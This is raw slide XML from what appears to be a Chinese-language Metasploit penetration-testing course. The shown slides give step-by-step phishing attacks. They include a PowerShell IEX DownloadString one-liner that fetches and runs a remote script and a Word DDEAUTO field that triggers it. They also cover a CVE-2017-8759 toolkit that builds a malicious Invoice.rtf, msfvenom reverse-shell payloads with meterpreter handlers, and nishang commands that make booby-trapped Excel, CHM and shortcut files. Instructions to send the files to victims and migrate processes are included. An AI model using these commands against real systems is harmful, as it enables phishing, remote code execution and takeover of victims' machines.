            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>set payload windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>meterpreter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reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> 192.168.8.124</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> 1125</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>我们将生成的脚本上传到第三方</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>vps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>虚拟主机服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>公网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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>让受害者服务器内存远程加载我们上传到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>vps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的恶意代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>x.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>执行，之后该服务器反过来连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>进行控制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>受害者客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>运行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(‘http://192.168.31.23/x.ps1’)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>查看当前是否有执行的会话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608" y="5532844"/>
            <a:ext cx="9266667" cy="238095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Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>配合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>word(13</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪装木马执行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39520"/>
            <a:ext cx="11214735" cy="4575491"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(ctrl+F9 )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>新建域代码，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DDEAUTO C:\\windows\\system32\\cmd.exe "/k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>('http://192.168.1.8/x.ps1')"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" y="3957292"/>
            <a:ext cx="4305300" cy="274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56" y="3201614"/>
            <a:ext cx="6813550" cy="4942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06" y="3082262"/>
            <a:ext cx="3048000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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用宏钓鱼思路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1489041"/>
            <a:ext cx="10515600" cy="4207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通过向受害者发送钓鱼文件，受害者点击钓鱼文件之后，会远程加载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>shell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>到受害者主机本地运行反弹会话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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用宏钓鱼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080" y="1184910"/>
            <a:ext cx="10515600" cy="42078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git clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://github.com/bhdresh/CVE-2017-8759.git</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>、执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>脚本cve-2017-8759_toolkit.py生成Invoice.rtf文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>:~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>桌面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/CVE-2017-8759# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.149.142/logo.txt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/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>、生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t> shell.exe，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>shell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>运行反弹连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>149.142</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> LPORT=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>1133</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> -f exe &gt; /root/shell.exe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74" y="1931864"/>
            <a:ext cx="7519670" cy="1298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93" y="5334253"/>
            <a:ext cx="7237730" cy="127571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980" y="44451"/>
            <a:ext cx="8354695" cy="640080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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>宏钓鱼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" y="684532"/>
            <a:ext cx="11120755" cy="513048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highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>、建立侦听把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>ms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>侦听的模块打开</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>python cve-2017-8759_toolkit.py -M exp -e http://192.168.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>149</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>42</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>/shell.exe -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>shell.exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>、开启监听模块，发送给目标运行钓鱼文件，等代上线</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>use exploit/multi/handler </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>set payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>windows/x64/meterpreter/reverse_tcp </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>lhost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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(kali)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Run</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>rtf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件放到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中运行即可</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>赶紧进程迁移，保证会话稳定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8590" y="2549525"/>
            <a:ext cx="269557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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>制作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>excel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>钓鱼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use exploit/multi/script/web_delivery</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>set target 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>set payload windows/meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>set LHOST 192.168.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.143</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>set URIPATH /</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>exploit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495" y="3234055"/>
            <a:ext cx="5742940" cy="314896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制作钓鱼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使用Out-Excel.ps1制作excel钓鱼文件:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>PS D:\temp&gt; . .\Out-Excel.ps1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>PS D:\temp&gt; Out-Excel -PayloadURL http://192.168.0.199:8080/ -OutputFile  D:\test.xls</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>制作chm钓鱼文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Out-CHM -PayloadURL http://192.168.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.143</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>:8080/ -HHCPath "C:\Program Files (x86)\HTML Help Workshop"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>制作快捷方式钓鱼文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>PS D:\temp&gt; . .\Out-Shortcut.ps1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>PS D:\temp&gt; Out-Shortcut -PayloadURL http://192.168.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.143</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>:8080/ -HotKey 'F3' -Icon 'notepad.exe'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err="1"/>
              <a:t>nishang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>插件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如何让已经攻击成功的服务器连接内网的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty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、路由器转发？  太容易暴露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vps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>转发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服务器转发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>其实就是购买了一个服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>、端口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kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>下载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客户端，与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建立隧道，当攻击的服务器与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建立连接，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就会将建立的会话转发给内网的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>kali(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>需要监听本机的对应的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(127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>、端口与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>端口一致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0" y="3952263"/>
            <a:ext cx="4858766" cy="228498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488,&quot;width&quot;:203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23653</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>1094</Paragraphs>
  <Slides>129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4" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>方正综艺简体</vt:lpstr>
      <vt:lpstr>Levenim MT</vt:lpstr>
      <vt:lpstr>Yu Gothic UI</vt:lpstr>
      <vt:lpstr>Kozuka Gothic Pro EL</vt:lpstr>
      <vt:lpstr>Yu Gothic UI Light</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>幼圆</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Metasploit</vt:lpstr>
      <vt:lpstr>专业术语</vt:lpstr>
      <vt:lpstr>MSF基础知识</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>全部参数的解释和利用</vt:lpstr>
      <vt:lpstr>启动设置</vt:lpstr>
      <vt:lpstr>信息搜集</vt:lpstr>
      <vt:lpstr>信息搜集</vt:lpstr>
      <vt:lpstr>高级扫描方式：</vt:lpstr>
      <vt:lpstr>使用 portscan模块扫端口</vt:lpstr>
      <vt:lpstr> 特定扫描</vt:lpstr>
      <vt:lpstr>找 mssql 主机：</vt:lpstr>
      <vt:lpstr>SSH 服务器扫描：</vt:lpstr>
      <vt:lpstr>Telnet服务器扫描：</vt:lpstr>
      <vt:lpstr>FTP 主机扫描：</vt:lpstr>
      <vt:lpstr>描 FTP 匿名登录：</vt:lpstr>
      <vt:lpstr>扫描局域网内有哪些主机存活</vt:lpstr>
      <vt:lpstr>扫描网站目录 用的不多  主要是针对windows环境的</vt:lpstr>
      <vt:lpstr>搜索网站中的E-mail地址 –目的：钓鱼（管理员）</vt:lpstr>
      <vt:lpstr>嗅探抓包 		内网嗅探但是前提是数据没有进行加密</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>ssh服务口令猜测</vt:lpstr>
      <vt:lpstr>mysql口令攻击</vt:lpstr>
      <vt:lpstr>postgresql攻击</vt:lpstr>
      <vt:lpstr>tomcat 管理接口 密码爆破攻击</vt:lpstr>
      <vt:lpstr>telnet 攻击</vt:lpstr>
      <vt:lpstr>samba攻击</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Metasploit 常用漏洞利用命令（一） </vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Metasploit 常用漏洞利用命令（二）</vt:lpstr>
      <vt:lpstr>Metasploit 常用漏洞利用命令（三）</vt:lpstr>
      <vt:lpstr>测试漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>ms10_002漏洞利用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Metasploit 常用渗透命令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设置要使用的反弹负载插件</vt:lpstr>
      <vt:lpstr>设置要监听的本地ip</vt:lpstr>
      <vt:lpstr>ms12-004</vt:lpstr>
      <vt:lpstr>Linux samba漏洞</vt:lpstr>
      <vt:lpstr>Ms17-010</vt:lpstr>
      <vt:lpstr>Ms17-010</vt:lpstr>
      <vt:lpstr>Ms17-010</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>msfvenom简介</vt:lpstr>
      <vt:lpstr>msfvenom简介</vt:lpstr>
      <vt:lpstr>常用参数</vt:lpstr>
      <vt:lpstr>监听参数</vt:lpstr>
      <vt:lpstr>handler后台持续监听 控制多台主机</vt:lpstr>
